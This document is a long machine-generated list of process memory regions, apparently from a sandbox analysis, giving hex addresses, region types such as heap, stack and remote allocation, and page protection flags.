7180000
trusted library allocation
page read and write
76C5000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
B2D0000
heap
page read and write
ABDB000
stack
page read and write
6A90000
trusted library allocation
page read and write
B162000
unkown
page read and write
72B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
CCB0000
heap
page read and write
EDCA4BF000
stack
page read and write
6A60000
unkown
page read and write
D40000
unkown
page readonly
7EE000
unkown
page read and write
6A9C000
trusted library allocation
page read and write
7FF9A5BD0000
trusted library allocation
page read and write
401000
unkown
page execute read
7310000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
6A77000
trusted library allocation
page read and write
20EA3B75000
heap
page read and write
20530C6C000
heap
page read and write
72B0000
trusted library allocation
page read and write
3DB1000
trusted library allocation
page read and write
105E000
stack
page read and write
7179000
trusted library allocation
page read and write
63B5000
unkown
page read and write
63C0000
trusted library allocation
page read and write
820FEFE000
stack
page read and write
20EA4322000
heap
page read and write
6A70000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
34A0000
heap
page read and write
3F81000
trusted library allocation
page read and write
20EA3B21000
heap
page read and write
6A90000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
5E60000
trusted library allocation
page read and write
7110000
trusted library allocation
page read and write
10A0000
heap
page read and write
172851F0000
heap
page read and write
5F40000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
20EA3AA7000
heap
page read and write
3241000
trusted library allocation
page read and write
1F0000
heap
page read and write
7120000
trusted library allocation
page read and write
635E000
stack
page read and write
756F000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
20EA3AB2000
heap
page read and write
63C7000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
20EA3AEC000
heap
page read and write
62F0000
trusted library allocation
page read and write
20EA3AA0000
heap
page read and write
7FF9A5954000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
62B0000
trusted library allocation
page read and write
7470000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
20EA3A9E000
heap
page read and write
5E70000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
63B6000
trusted library allocation
page read and write
71A0000
trusted library allocation
page read and write
1FE000
stack
page read and write
62F0000
trusted library allocation
page read and write
7340000
trusted library allocation
page read and write
6BEB000
trusted library allocation
page read and write
2FA0000
trusted library allocation
page read and write
63C0000
unkown
page read and write
6A70000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
7380000
trusted library allocation
page read and write
71D0000
trusted library allocation
page read and write
20EA3BFF000
heap
page read and write
7380000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
6A60000
unkown
page read and write
2FE0000
unkown
page readonly
20EA3880000
heap
page read and write
72B0000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
63C9000
trusted library allocation
page read and write
2C814638000
heap
page read and write
62A0000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
2C814560000
heap
page read and write
6280000
trusted library allocation
page read and write
DDE000
stack
page read and write
63C5000
unkown
page read and write
6280000
trusted library allocation
page read and write
EDCA279000
stack
page read and write
6AE0000
trusted library allocation
page read and write
20530BA0000
heap
page read and write
20EA3A9B000
heap
page read and write
80CE000
stack
page read and write
20EA3A8D000
heap
page read and write
6A60000
trusted library allocation
page read and write
6283000
trusted library allocation
page read and write
20EA3B86000
heap
page read and write
63C5000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
74FE000
stack
page read and write
72B0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
7320000
trusted library allocation
page read and write
7350000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
20EA3BF6000
heap
page read and write
6270000
trusted library allocation
page read and write
20EA3BAB000
heap
page read and write
D7A000
unkown
page write copy
6A60000
unkown
page read and write
63B0000
trusted library allocation
page read and write
F10000
heap
page read and write
62A0000
trusted library allocation
page read and write
7120000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
20EA434D000
heap
page read and write
72B0000
trusted library allocation
page read and write
6C16000
trusted library allocation
page read and write
7440000
trusted library allocation
page read and write
5E80000
trusted library allocation
page execute and read and write
2FAD000
trusted library allocation
page execute and read and write
E6D000
stack
page read and write
6340000
trusted library allocation
page read and write
2E9A000
stack
page read and write
20EA435C000
heap
page read and write
7160000
trusted library allocation
page read and write
A40000
heap
page read and write
E9E000
unkown
page read and write
6A70000
trusted library allocation
page read and write
A70000
heap
page read and write
5E70000
trusted library allocation
page read and write
83E000
stack
page read and write
590000
unkown
page readonly
B31B000
heap
page read and write
53D000
stack
page read and write
6A60000
trusted library allocation
page read and write
63C0000
unkown
page read and write
311A000
heap
page read and write
20EA3A90000
heap
page read and write
6282000
trusted library allocation
page read and write
55A68FF000
stack
page read and write
6C0E000
trusted library allocation
page read and write
5F40000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
B305000
heap
page read and write
7FF9A5C60000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
3307000
heap
page read and write
6A70000
trusted library allocation
page read and write
6BF0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7242000
trusted library allocation
page read and write
B2D3000
heap
page read and write
34E0000
heap
page read and write
7566000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
20EA3AC0000
heap
page read and write
6A70000
trusted library allocation
page read and write
63B3000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20EA3B74000
heap
page read and write
62E0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
71B0000
trusted library allocation
page read and write
7680000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
DA0000
heap
page read and write
6280000
trusted library allocation
page read and write
2C814629000
heap
page read and write
6A60000
trusted library allocation
page read and write
B335000
heap
page read and write
71A0000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
72B1000
trusted library allocation
page read and write
7FF9A5B01000
trusted library allocation
page read and write
3D7D000
trusted library allocation
page read and write
109E000
stack
page read and write
6A70000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
D33C000
stack
page read and write
31FE000
stack
page read and write
3250000
heap
page read and write
7690000
trusted library allocation
page read and write
20EA3BF3000
heap
page read and write
20EA3BF2000
heap
page read and write
2FA4000
trusted library allocation
page read and write
7460000
trusted library allocation
page read and write
A655BBF000
stack
page read and write
20EA3BF1000
heap
page read and write
5EE0000
trusted library allocation
page read and write
10DD000
stack
page read and write
63C0000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
2C8145F0000
trusted library allocation
page read and write
D5BE000
stack
page read and write
7300000
trusted library allocation
page read and write
20EA3A87000
heap
page read and write
5F46000
trusted library allocation
page read and write
744A000
trusted library allocation
page read and write
20530CBB000
heap
page read and write
20EA3B9B000
heap
page read and write
AB7000
heap
page read and write
20EA3ADC000
heap
page read and write
6A90000
trusted library allocation
page read and write
1040000
remote allocation
page read and write
6C02000
trusted library allocation
page read and write
7130000
trusted library allocation
page read and write
3A5E000
stack
page read and write
7230000
trusted library allocation
page read and write
20EA3B16000
heap
page read and write
6B62000
trusted library allocation
page read and write
63AE000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
9F0000
unkown
page readonly
810E000
stack
page read and write
6270000
trusted library allocation
page read and write
34F0000
heap
page read and write
17285200000
heap
page read and write
DF0000
remote allocation
page read and write
A3E000
stack
page read and write
20EA3AA9000
heap
page read and write
6A80000
trusted library allocation
page read and write
6310000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
D8F000
stack
page read and write
7400000
trusted library allocation
page read and write
800000
remote allocation
page read and write
20EA3AE4000
heap
page read and write
20EA38F0000
heap
page read and write
6270000
trusted library allocation
page read and write
2019000
trusted library allocation
page read and write
3260000
heap
page read and write
6A70000
trusted library allocation
page read and write
6D0000
remote allocation
page read and write
20EA3B32000
heap
page read and write
6A70000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
3E30000
trusted library allocation
page read and write
63C7000
trusted library allocation
page read and write
2C814613000
heap
page read and write
7150000
trusted library allocation
page read and write
20EA435F000
heap
page read and write
5F30000
trusted library allocation
page read and write
20EA3B0E000
heap
page read and write
74F0000
trusted library allocation
page read and write
63C0000
unkown
page read and write
1496000
unkown
page write copy
700000
trusted library allocation
page read and write
323D000
stack
page read and write
3ED7000
trusted library allocation
page read and write
3380000
heap
page read and write
7550000
unkown
page read and write
7E0000
trusted library allocation
page read and write
20EA3BAD000
heap
page read and write
20EA3AB8000
heap
page read and write
3640000
heap
page read and write
5F40000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
5F0000
trusted library allocation
page read and write
3300000
heap
page read and write
1DBFD390000
heap
page read and write
6A60000
trusted library allocation
page read and write
3507000
heap
page read and write
63C5000
trusted library allocation
page read and write
63F0000
trusted library allocation
page read and write
7460000
trusted library allocation
page read and write
FE0000
remote allocation
page read and write
63C0000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
20EA3B1B000
heap
page read and write
1DBFEEF5000
heap
page read and write
320D000
stack
page read and write
7F0000
heap
page read and write
6A70000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
7571000
trusted library allocation
page read and write
395E000
stack
page read and write
7700000
trusted library allocation
page read and write
EDCB08B000
stack
page read and write
20EA3AD8000
heap
page read and write
6A60000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
63CD000
trusted library allocation
page read and write
33E0000
heap
page read and write
6AC5000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
AD0000
heap
page read and write
800000
heap
page read and write
7F0000
heap
page read and write
6A70000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
AFDD000
heap
page read and write
71B0000
trusted library allocation
page read and write
F17000
heap
page read and write
3F22000
trusted library allocation
page read and write
2FB2000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
427000
unkown
page readonly
62F0000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
20EA3AF2000
heap
page read and write
3F0000
remote allocation
page read and write
1235000
heap
page read and write
F8F000
stack
page read and write
32BF000
stack
page read and write
72B0000
trusted library allocation
page read and write
20EA4359000
heap
page read and write
20EA3BC9000
heap
page read and write
5E70000
trusted library allocation
page read and write
3AD9000
trusted library allocation
page read and write
72D0000
trusted library allocation
page read and write
20EA3AB6000
heap
page read and write
6A65000
trusted library allocation
page read and write
20EA4405000
heap
page read and write
7FF9A5B40000
trusted library allocation
page execute and read and write
7500000
trusted library allocation
page read and write
20533C49000
trusted library allocation
page read and write
9C0000
heap
page read and write
6A60000
trusted library allocation
page read and write
20EA3AAB000
heap
page read and write
20EA3890000
heap
page read and write
72B0000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
9F0000
unkown
page readonly
6A90000
trusted library allocation
page read and write
6A60000
unkown
page read and write
AD0000
heap
page read and write
6A66000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
1DBFD4F0000
heap
page read and write
63C6000
trusted library allocation
page read and write
20EA3ACC000
heap
page read and write
7720000
trusted library allocation
page read and write
20EA3A98000
heap
page read and write
3870000
heap
page read and write
20530FD5000
heap
page read and write
20EA3BA8000
heap
page read and write
62C0000
trusted library allocation
page read and write
20530CB8000
heap
page read and write
70E0000
trusted library allocation
page read and write
2F90000
trusted library allocation
page read and write
13A0000
unkown
page readonly
72B0000
trusted library allocation
page read and write
D90000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
20EA3A83000
heap
page read and write
3410000
heap
page read and write
1DF8CB20000
heap
page read and write
6A70000
trusted library allocation
page read and write
20EA3B7A000
heap
page read and write
20EA3AB0000
heap
page read and write
63C0000
trusted library allocation
page read and write
EDCA2BE000
stack
page read and write
63B0000
trusted library allocation
page read and write
20EA3A85000
heap
page read and write
31B0000
heap
page read and write
B326000
heap
page read and write
4D0000
heap
page read and write
62E0000
trusted library allocation
page execute and read and write
10000000
direct allocation
page read and write
7440000
trusted library allocation
page read and write
7450000
trusted library allocation
page read and write
82102FF000
stack
page read and write
9AE000
stack
page read and write
20EA3B59000
heap
page read and write
6A70000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
5EE0000
trusted library allocation
page read and write
3900000
trusted library allocation
page read and write
20EA3A7B000
heap
page read and write
63C0000
unkown
page read and write
20EA3BC5000
heap
page read and write
20EA3BC3000
heap
page read and write
A80000
heap
page read and write
6A70000
trusted library allocation
page read and write
7FF9A5BA0000
trusted library allocation
page read and write
6A64000
unkown
page read and write
63B0000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
AFF6000
heap
page read and write
B374000
heap
page read and write
311A000
heap
page read and write
2F0C000
stack
page read and write
7310000
trusted library allocation
page read and write
20EA3B44000
heap
page read and write
3EB8000
trusted library allocation
page read and write
20EA3BB3000
heap
page read and write
2054B0C0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
20EA3ACD000
heap
page read and write
20EA3B63000
heap
page read and write
2054B240000
heap
page read and write
20EA3BA6000
heap
page read and write
7300000
trusted library allocation
page read and write
3900000
trusted library allocation
page read and write
7580000
trusted library allocation
page read and write
820FFFC000
stack
page read and write
6270000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
F0E000
stack
page read and write
63B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
E00000
heap
page read and write
20EA4333000
heap
page read and write
63C0000
trusted library allocation
page read and write
2ECD000
stack
page read and write
20EA3AB2000
heap
page read and write
AFD7000
heap
page read and write
7FF9A5BB0000
trusted library allocation
page read and write
20EA4400000
heap
page read and write
2054AF02000
heap
page read and write
63C0000
trusted library allocation
page read and write
20EA3AB5000
heap
page read and write
62E0000
trusted library allocation
page read and write
A9F000
stack
page read and write
E9E000
stack
page read and write
7695000
trusted library allocation
page read and write
D76000
unkown
page read and write
EC0000
heap
page read and write
5F46000
trusted library allocation
page read and write
20EA3BCE000
heap
page read and write
76B0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
76D0000
trusted library allocation
page execute and read and write
7311000
trusted library allocation
page read and write
6A67000
trusted library allocation
page read and write
20EA3B2F000
heap
page read and write
5F00000
trusted library allocation
page read and write
480000
trusted library allocation
page read and write
7FF9A5A36000
trusted library allocation
page execute and read and write
3A60000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
3EEE000
trusted library allocation
page read and write
EC7000
heap
page read and write
6A70000
trusted library allocation
page read and write
DE0000
heap
page read and write
7600000
trusted library allocation
page read and write
2054B0C0000
trusted library allocation
page read and write
5F41000
trusted library allocation
page read and write
3D2A000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
62B5000
trusted library allocation
page read and write
1DBFED90000
heap
page read and write
63B5000
trusted library allocation
page read and write
7303000
trusted library allocation
page read and write
20EA3BA5000
heap
page read and write
20EA3AEF000
heap
page read and write
6A70000
trusted library allocation
page read and write
70E0000
trusted library allocation
page read and write
20EA3AC7000
heap
page read and write
6A65000
unkown
page read and write
20EA3B94000
heap
page read and write
343E000
unkown
page read and write
420000
unkown
page write copy
72B0000
trusted library allocation
page read and write
63B2000
trusted library allocation
page read and write
EDCA337000
stack
page read and write
28C0000
heap
page read and write
5E70000
trusted library allocation
page read and write
7370000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
7150000
trusted library allocation
page read and write
5F40000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
41B000
unkown
page readonly
EDC9EFE000
stack
page read and write
5EE0000
trusted library allocation
page read and write
C9C000
stack
page read and write
7350000
trusted library allocation
page read and write
7530000
trusted library allocation
page read and write
AA0000
trusted library allocation
page read and write
DF0000
remote allocation
page read and write
7FF9A5C50000
trusted library allocation
page read and write
93E000
stack
page read and write
7430000
trusted library allocation
page read and write
7160000
trusted library allocation
page read and write
73D0000
trusted library allocation
page read and write
7FF9A5BE0000
trusted library allocation
page read and write
76D000
stack
page read and write
8AC000
stack
page read and write
62C0000
trusted library allocation
page read and write
5E70000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
AFD0000
heap
page read and write
6A60000
trusted library allocation
page read and write
7330000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
20EA4359000
heap
page read and write
6A65000
trusted library allocation
page read and write
6AB000
stack
page read and write
3C80000
trusted library allocation
page read and write
C81000
unkown
page execute read
6A70000
trusted library allocation
page read and write
5F25000
trusted library allocation
page read and write
2C81463A000
heap
page read and write
34D0000
trusted library allocation
page read and write
30000
heap
page read and write
6A90000
trusted library allocation
page read and write
5F40000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6A60000
unkown
page read and write
AE7000
heap
page read and write
20EA3BD4000
heap
page read and write
6260000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
74B0000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
7564000
trusted library allocation
page read and write
750000
unkown
page readonly
7330000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20530FB0000
trusted library allocation
page read and write
7FF9A5CC0000
trusted library allocation
page read and write
32FE000
heap
page read and write
20EA3B78000
heap
page read and write
30CD000
heap
page read and write
7160000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
6A67000
unkown
page read and write
7220000
trusted library allocation
page read and write
6A60000
unkown
page read and write
7330000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
7572000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
15C000
stack
page read and write
20EA3AFF000
heap
page read and write
63BC000
trusted library allocation
page read and write
20EA3BB8000
heap
page read and write
6A90000
trusted library allocation
page read and write
2054B0D0000
trusted library allocation
page read and write
20EA3AFB000
heap
page read and write
20EA3B87000
heap
page read and write
20EA3BDC000
heap
page read and write
3D33000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
17285302000
heap
page read and write
EDCA07D000
stack
page read and write
20530C79000
heap
page read and write
5EE0000
trusted library allocation
page read and write
20EA4353000
heap
page read and write
83F000
stack
page read and write
20532660000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
7300000
trusted library allocation
page read and write
10C3000
stack
page read and write
3040000
heap
page read and write
72B0000
trusted library allocation
page read and write
6280000
trusted library allocation
page read and write
4B0000
heap
page read and write
6A70000
trusted library allocation
page read and write
3D52000
trusted library allocation
page read and write
78F000
stack
page read and write
CB0000
heap
page read and write
B335000
heap
page read and write
6A90000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
3E44000
trusted library allocation
page read and write
34FB000
heap
page read and write
6A60000
trusted library allocation
page read and write
6AB0000
trusted library allocation
page read and write
C90000
remote allocation
page read and write
5F40000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
1339000
unkown
page read and write
63C5000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
C3D000
stack
page read and write
940000
remote allocation
page read and write
B367000
heap
page read and write
AED000
stack
page read and write
6A70000
trusted library allocation
page read and write
7180000
trusted library allocation
page read and write
3F6D000
trusted library allocation
page read and write
7508000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
10B0000
remote allocation
page read and write
7340000
trusted library allocation
page read and write
20533915000
trusted library allocation
page read and write
9C0000
heap
page read and write
7660000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
90E000
unkown
page read and write
EDCA439000
stack
page read and write
624000
heap
page read and write
20EA3A7A000
heap
page read and write
B2C000
stack
page read and write
600000
heap
page read and write
62C0000
trusted library allocation
page read and write
EDC9F7F000
stack
page read and write
63C0000
trusted library allocation
page read and write
3270000
heap
page read and write
6A70000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
3900000
trusted library allocation
page read and write
6C10000
trusted library allocation
page read and write
63B0000
unkown
page read and write
6270000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
3900000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
8DD000
stack
page read and write
20EA3BB7000
heap
page read and write
7300000
trusted library allocation
page read and write
D50000
heap
page read and write
76A0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
20530CB6000
heap
page read and write
20EA3B14000
heap
page read and write
B164000
unkown
page readonly
A20000
remote allocation
page read and write
7150000
trusted library allocation
page read and write
20EA3B99000
heap
page read and write
2054B0C0000
trusted library allocation
page read and write
20EA3B13000
heap
page read and write
2021000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
2053396D000
trusted library allocation
page read and write
7620000
trusted library allocation
page read and write
6A90000
trusted library allocation
page read and write
20532C60000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
63C5000
unkown
page read and write
5E60000
trusted library allocation
page read and write
72B1000
trusted library allocation
page read and write
5F40000
trusted library allocation
page read and write
20EA4413000
heap
page read and write
3E59000
trusted library allocation
page read and write
4A91000
trusted library allocation
page read and write
5F38000
trusted library allocation
page read and write
6A75000
trusted library allocation
page read and write
3F8D000
trusted library allocation
page read and write
9D000
stack
page read and write
500000
remote allocation
page read and write
63C5000
unkown
page read and write
60F000
stack
page read and write
63B0000
trusted library allocation
page read and write
5CE000
stack
page read and write
20EA3BA9000
heap
page read and write
D50000
unkown
page read and write
B369000
heap
page read and write
756A000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
72B0000
trusted library allocation
page read and write
2FB6000
trusted library allocation
page read and write
328F000
stack
page read and write
20EA3BC6000
heap
page read and write
F0F000
stack
page read and write
62C0000
trusted library allocation
page read and write
7560000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
324E000
stack
page read and write
72B0000
trusted library allocation
page read and write
530000
heap
page read and write
6A90000
trusted library allocation
page read and write
20532C80000
heap
page read and write
6A70000
trusted library allocation
page read and write
71BF000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
D0F000
stack
page read and write
7FF9A5B0C000
trusted library allocation
page read and write
500000
remote allocation
page read and write
7370000
trusted library allocation
page read and write
10B54000
direct allocation
page read and write
63C0000
trusted library allocation
page read and write
FEF000
stack
page read and write
20EA4300000
heap
page read and write
AFE4000
heap
page read and write
6250000
trusted library allocation
page read and write
B326000
heap
page read and write
747E000
stack
page read and write
2EC0000
unkown
page read and write
5F00000
trusted library allocation
page read and write
59D000
stack
page read and write
420000
unkown
page write copy
3C60000
trusted library allocation
page read and write
7320000
trusted library allocation
page read and write
9FE000
stack
page read and write
38F0000
trusted library allocation
page read and write
63A0000
trusted library allocation
page read and write
20EA3ABF000
heap
page read and write
7310000
trusted library allocation
page read and write
7160000
unkown
page read and write
7330000
trusted library allocation
page read and write
9E0000
heap
page read and write
DBC000
stack
page read and write
20533991000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
3330000
heap
page read and write
63B0000
trusted library allocation
page read and write
5F50000
trusted library allocation
page read and write
20EA441F000
heap
page read and write
20EA3AE1000
heap
page read and write
3070000
heap
page read and write
72D0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
2EB0000
unkown
page readonly
63B0000
trusted library allocation
page read and write
20EA3A5A000
heap
page read and write
6300000
trusted library allocation
page read and write
ABBC000
stack
page read and write
20EA3B84000
heap
page read and write
63B0000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
20EA3B80000
heap
page read and write
20EA3B49000
heap
page read and write
3A70000
trusted library allocation
page read and write
17285241000
heap
page read and write
20EA3ACF000
heap
page read and write
62F0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
6D0000
remote allocation
page read and write
3230000
heap
page read and write
7110000
trusted library allocation
page read and write
20EA3AC5000
heap
page read and write
63B0000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
2FD5000
trusted library allocation
page execute and read and write
6280000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
7705000
trusted library allocation
page read and write
9CF000
stack
page read and write
62B0000
trusted library allocation
page read and write
76A0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
3A80000
heap
page execute and read and write
72C0000
trusted library allocation
page read and write
63B6000
unkown
page read and write
20EA3B3F000
heap
page read and write
3D0B000
trusted library allocation
page read and write
20EA3B29000
heap
page read and write
7310000
trusted library allocation
page read and write
770000
unkown
page read and write
63C0000
unkown
page read and write
5F00000
trusted library allocation
page read and write
20EA3B2B000
heap
page read and write
63C0000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
20EA3B7D000
heap
page read and write
6A65000
trusted library allocation
page read and write
3CAC000
trusted library allocation
page read and write
73A0000
trusted library allocation
page read and write
4A0000
heap
page read and write
20EA3B96000
heap
page read and write
20532785000
heap
page read and write
5F0D000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
20533976000
trusted library allocation
page read and write
20EA3A59000
heap
page read and write
34BF000
stack
page read and write
4BC000
stack
page read and write
6A70000
trusted library allocation
page read and write
20EA3B4A000
heap
page read and write
7720000
trusted library allocation
page read and write
6A67000
trusted library allocation
page read and write
63B4000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
3900000
trusted library allocation
page read and write
63C4000
unkown
page read and write
7300000
trusted library allocation
page read and write
C6D000
stack
page read and write
6A70000
trusted library allocation
page read and write
6A70000
trusted library allocation
page read and write
62A0000
trusted library allocation
page read and write
F80000
heap
page read and write
7260000
trusted library allocation
page read and write
3D72000
trusted library allocation
page read and write
3BCD000
trusted library allocation
page read and write
20EA3A99000
heap
page read and write
6A65000
unkown
page read and write
7310000
trusted library allocation
page read and write
10C8000
heap
page read and write
63B0000
unkown
page read and write
72D0000
trusted library allocation
page read and write
307A000
heap
page read and write
7610000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
62C0000
trusted library allocation
page read and write
63C5000
unkown
page read and write
6A70000
trusted library allocation
page read and write
72F0000
trusted library allocation
page read and write
CD0000
remote allocation
page read and write
423000
unkown
page read and write
1A59000
unkown
page read and write
5EE0000
trusted library allocation
page read and write
6A60000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
62E0000
trusted library allocation
page read and write
7540000
trusted library allocation
page read and write
2C814600000
heap
page read and write
6AD0000
trusted library allocation
page read and write
70F0000
trusted library allocation
page read and write
20EA4402000
heap
page read and write
1DF8CD95000
heap
page read and write
3D7B000
trusted library allocation
page read and write
EDCA3BC000
stack
page read and write
6A60000
trusted library allocation
page read and write
63A0000
trusted library allocation
page read and write
2FA3000
trusted library allocation
page execute and read and write
20EA3A80000
heap
page read and write
62E0000
trusted library allocation
page read and write
7170000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
17285AA0000
remote allocation
page read and write
7300000
trusted library allocation
page read and write
7310000
trusted library allocation
page read and write
87E000
stack
page read and write
33E6000
heap
page read and write
6A8F000
trusted library allocation
page read and write
20EA3B39000
heap
page read and write
62F0000
trusted library allocation
page read and write
3F0000
remote allocation
page read and write
63B0000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
7C0000
heap
page read and write
7430000
trusted library allocation
page read and write
13A0000
unkown
page readonly
63C0000
trusted library allocation
page read and write
5DB000
stack
page read and write
20EA3B5A000
heap
page read and write
710000
heap
page read and write
2C814602000
heap
page read and write
7590000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6270000
trusted library allocation
page read and write
6A65000
trusted library allocation
page read and write
6300000
trusted library allocation
page read and write
C5D000
stack
page read and write
B2B8000
heap
page read and write
830000
heap
page read and write
2DDA000
heap
page read and write
5F40000
trusted library allocation
page read and write
AF40000
heap
page read and write
422000
unkown
page write copy
6A70000
trusted library allocation
page read and write
63C5000
trusted library allocation
page read and write
3EF7000
trusted library allocation
page read and write
7290000
trusted library allocation
page read and write
6A80000
trusted library allocation
page read and write
20EA3A7D000
heap
page read and write
7240000
trusted library allocation
page read and write
33CE000
unkown
page read and write
ABE000
stack
page read and write
2054AD4B000
heap
page read and write
73B0000
trusted library allocation
page read and write
B335000
heap
page read and write
6B10000
trusted library allocation
page read and write
9E0000
heap
page read and write
63C5000
trusted library allocation
page read and write
62B0000
trusted library allocation
page read and write
62F0000
trusted library allocation
page read and write
20EA3ACB000
heap
page read and write
20EA434B000
heap
page read and write
400000
unkown
page readonly
72E0000
trusted library allocation
page read and write
17285190000
heap
page read and write
20EA440C000
heap
page read and write
C77000
stack
page read and write
63B0000
trusted library allocation
page read and write
7510000
trusted library allocation
page read and write
3D5D000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
6275000
trusted library allocation
page read and write
3F41000
trusted library allocation
page read and write
20532C60000
trusted library allocation
page read and write
AFF7000
heap
page read and write
3E8F000
trusted library allocation
page read and write
63C0000
trusted library allocation
page read and write
63B0000
trusted library allocation
page read and write
72E0000
trusted library allocation
page read and write
20533CA3000
trusted library allocation
page read and write
100000
heap
page read and write
73C0000
trusted library allocation
page read and write
41B000
unkown
page readonly
62C0000
trusted library allocation
page read and write
63B0000
trusted library allocation
